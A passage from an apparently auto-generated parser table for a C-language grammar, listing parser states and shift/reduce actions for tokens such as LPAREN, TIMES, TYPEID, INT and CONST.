66,-152,-153,138,-307,-132,-133,-70,163,23,127,-309,127,127,-309,-28,23,23,127,-165,-167,138,138,-135,-308,23,-130,163,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,127,127,163,285,127,127,127,127,127,-266,-267,-268,-265,-269,-270,-71,-309,127,-309,-28,-266,127,127,127,23,23,127,-154,138,127,-137,-139,-134,-128,-129,127,-131,-202,-201,163,127,163,-218,127,127,127,127,163,-80,127,-214,-215,-217,127,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,127,127,127,127,127,127,127,127,127,127,127,127,127,127,127,127,127,127,127,127,127,424,426,127,127,-11,127,-12,127,127,-266,127,127,-309,127,23,-266,127,-155,-156,-136,-138,23,127,-203,163,-205,127,-79,127,-213,-216,-309,-182,127,-309,-28,-266,-204,127,163,-309,163,163,127,127,127,127,127,127,-11,-266,127,127,-206,-80,-208,-209,127,163,-309,127,127,127,-207,-210,163,163,-212,-211,]),'LPAREN':([0,2,4,5,6,7,8,9,11,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,60,61,63,64,65,66,68,71,75,76,77,78,79,81,82,83,84,85,86,87,94,95,96,97,98,99,101,102,103,105,106,110,111,113,114,116,117,118,126,127,129,130,131,132,133,142,144,145,148,152,153,154,155,156,157,158,159,160,161,162,163,164,167,168,170,171,172,173,177,182,183,184,185,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,212,215,216,217,218,222,225,226,227,228,234,235,238,239,240,241,246,248,250,252,253,256,257,262,263,264,265,267,271,272,273,274,277,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,325,326,328,332,333,334,338,339,340,343,346,347,348,349,350,351,352,358,359,360,364,368,369,371,372,375,376,378,379,381,382,384,386,387,389,390,394,395,397,398,399,422,424,425,426,427,432,434,438,439,442,443,444,445,446,449,450,451,452,454,458,459,460,461,463,464,465,466,468,469,470,471,476,477,479,480,482,483,484,485,486,487,488,489,490,491,493,494,497,503,504,507,508,509,511,513,515,516,517,518,519,520,522,525,526,528,],[24,24,-60,-62,-63,-64,-65,-66,71,-67,-68,80,24,-309,-309,-309,-116,-93,24,-29,24,-97,-309,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,71,24,-89,-90,-91,-92,71,71,115,-37,-83,-69,-309,80,-86,-9,-10,-87,-88,-94,-164,-27,-28,-166,-152,-153,-307,-132,-133,-70,168,115,71,168,-309,168,-309,-28,238,-294,71,168,-30,-165,-167,-135,-308,71,-130,168,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,271,274,168,279,280,168,284,168,322,328,328,271,332,-266,-267,-268,-265,-271,-269,-270,-283,-284,-285,-286,335,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-71,-38,-309,168,-309,-28,-266,168,168,-35,-36,238,361,238,168,-45,370,-154,271,-137,-139,-134,-128,-129,271,-131,-202,-201,168,168,168,-218,168,390,168,168,168,168,-80,168,-214,-215,-217,168,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,168,271,271,271,271,271,271,271,271,271,271,271,271,271,271,271,271,271,271,168,168,-279,-280,168,168,-304,-306,-11,168,-12,271,-266,168,168,-43,-44,-31,-34,361,370,-309,238,-266,168,-155,-156,-136,-138,71,271,-203,168,-205,271,-287,390,390,465,-79,168,-213,-216,-274,-275,-276,-277,-278,-309,-182,-39,-42,-32,-33,168,-309,-28,-191,-197,-193,-195,-266,-204,271,168,-309,168,168,168,168,271,-272,-273,168,168,-11,-40,-41,-266,168,168,-50,-51,-192,-194,-196,-206,-80,-208,-209,168,-46,-49,168,-281,-309,168,-288,168,-47,-48,-207,-282,-210,168,168,-212,-211,]),'TIMES':([0,2,4,5,6,7,8,9,11,13,14,17,18,19,20,21,22,24,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,60,61,63,64,65,66,71,77,78,79,82,83,84,85,86,87,94,95,96,97,98,99,101,102,103,105,106,111,113,114,116,117,118,126,127,129,130,133,142,144,145,148,152,153,154,155,156,157,158,159,160,161,162,163,164,168,172,177,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,200,201,202,203,204,205,206,207,208,209,210,215,216,217,218,222,225,226,238,239,246,248,250,252,253,256,257,262,263,264,265,267,270,271,272,273,274,277,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,325,326,327,328,329,330,331,332,333,334,338,339,340,343,346,347,348,360,368,369,371,372,375,376,378,379,381,382,384,386,387,390,395,397,398,399,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,432,434,444,445,446,454,458,459,460,461,462,463,464,465,466,468,469,470,471,473,476,477,482,483,484,490,491,493,494,497,507,508,509,511,513,515,518,519,520,522,525,526,528,],[26,26,-60,-62,-63,-64,-65,-66,26,-67,-68,-309,-309,-309,-116,-93,26,26,-97,-309,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,26,26,-89,-90,-91,-92,26,-83,-69,-309,-86,-9,-10,-87,-88,-94,26,-27,-28,-166,-152,-153,-307,-132,-133,-70,188,26,188,-309,222,-309,-28,26,-294,26,188,-167,-135,-308,26,-130,188,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,188,188,188,188,-257,303,-259,188,188,188,-238,188,-266,-267,-268,-265,-271,-269,-270,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-71,-309,346,-309,-28,-266,188,188,26,368,-154,188,-137,-139,-134,-128,-129,188,-131,-202,-201,188,-257,188,188,-218,188,26,188,188,188,188,-80,188,-214,-215,-217,188,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,-279,-280,-260,188,-261,-262,-263,188,-304,-306,-11,188,-12,188,-266,188,188,-309,-266,454,-155,-156,-136,-138,26,188,-203,188,-205,188,-287,26,-79,188,-213,-216,-239,-240,-241,303,303,303,303,303,303,303,303,303,303,303,303,303,303,303,-274,-275,-276,-277,-278,-309,-182,482,-309,-28,-266,-204,188,188,-309,-258,188,188,188,188,188,-272,-273,188,-264,188,-11,-266,188,188,-206,-80,-208,-209,188,188,-281,-309,188,-288,188,-207,-282,-210,188,188,-212,-211,]),'TYPEID':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,58,59,60,61,62,63,64,65,66,68,71,77,78,80,81,82,83,84,85,86,87,94,95,96,97,98,99,101,102,103,104,105,106,107,111,115,126,128,129,131,132,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,234,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,282,283,284,286,287,289,323,324,328,332,335,351,352,361,370,371,372,375,376,377,378,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[30,30,-60,-62,-63,-64,-65,-66,30,76,-67,-68,-52,-309,-309,-309,-116,-93,30,-29,-97,-309,-113,-114,-115,-221,99,103,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-140,-141,-61,30,-84,76,30,30,-89,-90,-91,-92,76,76,-83,-69,30,-53,-86,-9,-10,-87,-88,-94,-164,-27,-28,-166,-152,-153,-307,-132,-133,30,-70,30,-85,76,30,240,30,76,-30,-165,-167,30,30,30,-135,-142,-308,76,-145,-146,-130,30,30,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,30,-71,-35,-36,30,240,30,-154,30,-137,30,-139,-134,-143,-128,-129,-131,-202,-201,30,-218,-78,-80,30,-214,-215,-217,425,427,30,30,30,-31,-34,30,30,-155,-156,-136,-138,-144,76,-203,-205,30,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'ENUM':([0,2,4,5,6,7,8,9,10,13,14,15,17,18,19,22,23,25,45,46,47,48,49,50,51,52,55,58,59,61,62,77,78,80,81,82,83,84,85,86,97,101,104,105,106,107,115,128,131,133,139,140,141,143,144,146,147,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,249,251,254,264,265,271,273,282,283,284,286,287,289,328,332,335,351,352,361,370,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[31,31,-60,-62,-63,-64,-65,-66,31,-67,-68,-52,-309,-309,-309,31,-29,-97,-117,-118,-119,-95,-96,-98,-99,-100,-61,31,-84,31,31,-83,-69,31,-53,-86,-9,-10,-87,-88,-166,-307,31,-70,31,-85,31,31,-30,-167,31,31,31,-142,-308,-145,-146,31,31,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,31,-71,-35,-36,31,31,31,31,-143,-202,-201,31,-218,-78,-80,31,-214,-215,-217,31,31,31,-31,-34,31,31,-144,-203,-205,31,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'VOID':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[33,33,-60,-62,-63,-64,-65,-66,33,33,-67,-68,-52,-309,-309,-309,-116,-93,33,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,33,-84,33,33,33,-89,-90,-91,-92,-83,-69,33,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,33,-70,33,-85,33,33,33,-30,-167,33,33,33,-135,-142,-308,33,-145,-146,-130,33,33,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,33,-71,-35,-36,33,33,-154,33,-137,33,-139,-134,-143,-128,-129,-131,-202,-201,33,-218,33,-78,-80,33,-214,-215,-217,33,33,33,-31,-34,33,33,-155,-156,-136,-138,-144,-203,-205,33,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'_BOOL':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[34,34,-60,-62,-63,-64,-65,-66,34,34,-67,-68,-52,-309,-309,-309,-116,-93,34,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,34,-84,34,34,34,-89,-90,-91,-92,-83,-69,34,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,34,-70,34,-85,34,34,34,-30,-167,34,34,34,-135,-142,-308,34,-145,-146,-130,34,34,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,34,-71,-35,-36,34,34,-154,34,-137,34,-139,-134,-143,-128,-129,-131,-202,-201,34,-218,34,-78,-80,34,-214,-215,-217,34,34,34,-31,-34,34,34,-155,-156,-136,-138,-144,-203,-205,34,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'CHAR':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[35,35,-60,-62,-63,-64,-65,-66,35,35,-67,-68,-52,-309,-309,-309,-116,-93,35,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,35,-84,35,35,35,-89,-90,-91,-92,-83,-69,35,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,35,-70,35,-85,35,35,35,-30,-167,35,35,35,-135,-142,-308,35,-145,-146,-130,35,35,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,35,-71,-35,-36,35,35,-154,35,-137,35,-139,-134,-143,-128,-129,-131,-202,-201,35,-218,35,-78,-80,35,-214,-215,-217,35,35,35,-31,-34,35,35,-155,-156,-136,-138,-144,-203,-205,35,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'SHORT':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[36,36,-60,-62,-63,-64,-65,-66,36,36,-67,-68,-52,-309,-309,-309,-116,-93,36,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,36,-84,36,36,36,-89,-90,-91,-92,-83,-69,36,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,36,-70,36,-85,36,36,36,-30,-167,36,36,36,-135,-142,-308,36,-145,-146,-130,36,36,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,36,-71,-35,-36,36,36,-154,36,-137,36,-139,-134,-143,-128,-129,-131,-202,-201,36,-218,36,-78,-80,36,-214,-215,-217,36,36,36,-31,-34,36,36,-155,-156,-136,-138,-144,-203,-205,36,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'INT':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[37,37,-60,-62,-63,-64,-65,-66,37,37,-67,-68,-52,-309,-309,-309,-116,-93,37,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,37,-84,37,37,37,-89,-90,-91,-92,-83,-69,37,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,37,-70,37,-85,37,37,37,-30,-167,37,37,37,-135,-142,-308,37,-145,-146,-130,37,37,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,37,-71,-35,-36,37,37,-154,37,-137,37,-139,-134,-143,-128,-129,-131,-202,-201,37,-218,37,-78,-80,37,-214,-215,-217,37,37,37,-31,-34,37,37,-155,-156,-136,-138,-144,-203,-205,37,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'LONG':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[38,38,-60,-62,-63,-64,-65,-66,38,38,-67,-68,-52,-309,-309,-309,-116,-93,38,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,38,-84,38,38,38,-89,-90,-91,-92,-83,-69,38,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,38,-70,38,-85,38,38,38,-30,-167,38,38,38,-135,-142,-308,38,-145,-146,-130,38,38,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,38,-71,-35,-36,38,38,-154,38,-137,38,-139,-134,-143,-128,-129,-131,-202,-201,38,-218,38,-78,-80,38,-214,-215,-217,38,38,38,-31,-34,38,38,-155,-156,-136,-138,-144,-203,-205,38,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'FLOAT':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[39,39,-60,-62,-63,-64,-65,-66,39,39,-67,-68,-52,-309,-309,-309,-116,-93,39,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,39,-84,39,39,39,-89,-90,-91,-92,-83,-69,39,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,39,-70,39,-85,39,39,39,-30,-167,39,39,39,-135,-142,-308,39,-145,-146,-130,39,39,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,39,-71,-35,-36,39,39,-154,39,-137,39,-139,-134,-143,-128,-129,-131,-202,-201,39,-218,39,-78,-80,39,-214,-215,-217,39,39,39,-31,-34,39,39,-155,-156,-136,-138,-144,-203,-205,39,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'DOUBLE':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[40,40,-60,-62,-63,-64,-65,-66,40,40,-67,-68,-52,-309,-309,-309,-116,-93,40,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,40,-84,40,40,40,-89,-90,-91,-92,-83,-69,40,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,40,-70,40,-85,40,40,40,-30,-167,40,40,40,-135,-142,-308,40,-145,-146,-130,40,40,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,40,-71,-35,-36,40,40,-154,40,-137,40,-139,-134,-143,-128,-129,-131,-202,-201,40,-218,40,-78,-80,40,-214,-215,-217,40,40,40,-31,-34,40,40,-155,-156,-136,-138,-144,-203,-205,40,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'_COMPLEX':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[41,41,-60,-62,-63,-64,-65,-66,41,41,-67,-68,-52,-309,-309,-309,-116,-93,41,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,41,-84,41,41,41,-89,-90,-91,-92,-83,-69,41,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,41,-70,41,-85,41,41,41,-30,-167,41,41,41,-135,-142,-308,41,-145,-146,-130,41,41,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,41,-71,-35,-36,41,41,-154,41,-137,41,-139,-134,-143,-128,-129,-131,-202,-201,41,-218,41,-78,-80,41,-214,-215,-217,41,41,41,-31,-34,41,41,-155,-156,-136,-138,-144,-203,-205,41,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'SIGNED':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[42,42,-60,-62,-63,-64,-65,-66,42,42,-67,-68,-52,-309,-309,-309,-116,-93,42,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,42,-84,42,42,42,-89,-90,-91,-92,-83,-69,42,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,42,-70,42,-85,42,42,42,-30,-167,42,42,42,-135,-142,-308,42,-145,-146,-130,42,42,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,42,-71,-35,-36,42,42,-154,42,-137,42,-139,-134,-143,-128,-129,-131,-202,-201,42,-218,42,-78,-80,42,-214,-215,-217,42,42,42,-31,-34,42,42,-155,-156,-136,-138,-144,-203,-205,42,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'UNSIGNED':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[43,43,-60,-62,-63,-64,-65,-66,43,43,-67,-68,-52,-309,-309,-309,-116,-93,43,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,43,-84,43,43,43,-89,-90,-91,-92,-83,-69,43,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,43,-70,43,-85,43,43,43,-30,-167,43,43,43,-135,-142,-308,43,-145,-146,-130,43,43,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,43,-71,-35,-36,43,43,-154,43,-137,43,-139,-134,-143,-128,-129,-131,-202,-201,43,-218,43,-78,-80,43,-214,-215,-217,43,43,43,-31,-34,43,43,-155,-156,-136,-138,-144,-203,-205,43,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'__INT128':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[44,44,-60,-62,-63,-64,-65,-66,44,44,-67,-68,-52,-309,-309,-309,-116,-93,44,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,44,-84,44,44,44,-89,-90,-91,-92,-83,-69,44,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,44,-70,44,-85,44,44,44,-30,-167,44,44,44,-135,-142,-308,44,-145,-146,-130,44,44,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,44,-71,-35,-36,44,44,-154,44,-137,44,-139,-134,-143,-128,-129,-131,-202,-201,44,-218,44,-78,-80,44,-214,-215,-217,44,44,44,-31,-34,44,44,-155,-156,-136,-138,-144,-203,-205,44,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'CONST':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,79,80,81,87,96,97,98,99,101,102,103,104,105,106,107,114,115,117,118,126,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,217,218,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,360,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,445,446,458,490,491,493,494,518,520,526,528,],[45,45,-60,-62,-63,-64,-65,-66,45,45,-67,-68,-52,45,45,45,-116,-93,-29,-97,45,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,45,-84,45,45,-89,-90,-91,-92,-83,-69,45,45,-53,-94,45,-166,-152,-153,-307,-132,-133,45,-70,45,-85,45,45,45,45,45,-30,-167,45,45,45,-135,-142,-308,45,-145,-146,-130,45,45,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,45,-71,45,45,-35,-36,45,45,-154,45,-137,45,-139,-134,-143,-128,-129,-131,-202,-201,45,-218,45,-78,-80,45,-214,-215,-217,45,45,45,-31,-34,45,45,45,-155,-156,-136,-138,-144,-203,-205,45,-79,-213,-216,-32,-33,45,45,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'RESTRICT':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,23,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,62,63,64,65,66,77,78,79,80,81,87,96,97,98,99,101,102,103,104,105,106,107,114,115,117,118,126,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,217,218,227,228,22